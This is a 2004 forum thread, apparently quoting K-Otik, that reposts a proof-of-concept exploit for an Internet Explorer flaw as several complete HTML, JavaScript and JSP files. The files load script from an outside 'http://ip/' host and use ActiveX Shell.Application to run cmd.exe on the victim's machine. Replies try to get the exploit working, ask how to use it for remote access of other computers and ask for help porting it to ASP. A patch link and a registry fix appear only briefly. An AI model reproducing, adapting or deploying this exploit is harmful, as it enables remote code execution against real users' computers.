[TheOther]

From K-Otik:

Proof of Concept Exploit by Jelmer
Solution : The IEFix.reg registry file will protect you from this new variant/exploit

http://www.k-otik.co...072004IEfix.reg


----------------------------------------------------- installer.htm -------------------------------------------------------
<html>
<body>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;
dialogWidth:1\;").location="vb script:\"<script SRC='http://ip/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm ---------------------------------------------------------
<script language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<script SRC='http://ip/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language=
"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--------------------------------------------------------- redir.jsp ----------------------------------------------------------
<% Thread.sleep(1500);
response.setStatus(302);
response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm");
%>

[myth]

heh

many of us probably already have the via the mailing list, however, i havent managed tog et a working version of it


Ive tried via IIS6 (highly untweaked) and via our hosting (also highly untweaked) if any of you have managed to get a working version of this please, either tell me, you haven't done anything and it just worked, or if there were any tweaks you have made to get it to work....

Ive made the project via Macromedia, getting errors for the function called on installer.htm ... and a couple other errors... any more infor would be great, other than that. all my other systems under my command are gonna get that reg file in a few days

[BeNiNuK]

posted 3 times :S

[som3aa]

http://www.microsoft.com/downloads/details.aspx?FamilyId=4D056748-C538-46F6-B7C8-2FBFD0D237E3&displaylang=en

download patch from here to Windows 2000, Windows NT, Windows Server 2003, Windows XP ;)

[n0vun]

som3aa, on Jul 9 2004, 07:03 PM, said:

http://www.microsoft.com/downloads/details.aspx?FamilyId=4D056748-C538-46F6-B7C8-2FBFD0D237E3&displaylang=en

download patch from here to Windows 2000, Windows NT, Windows Server 2003, Windows XP ;)

That patch is for the ADODB.Stream version of this exploit not for the updated one. ;)

[som3aa]

small question please
how could this be used to get remote access of other computers?

[setthesun]

Anyone in there can convert this into ASP or PHP ?

What I'm missing while converting it to ASP ?

'wait 1,5 sedonds

Response.Redirect "URL:res://shdoclc.dll/HTTP_501.htm"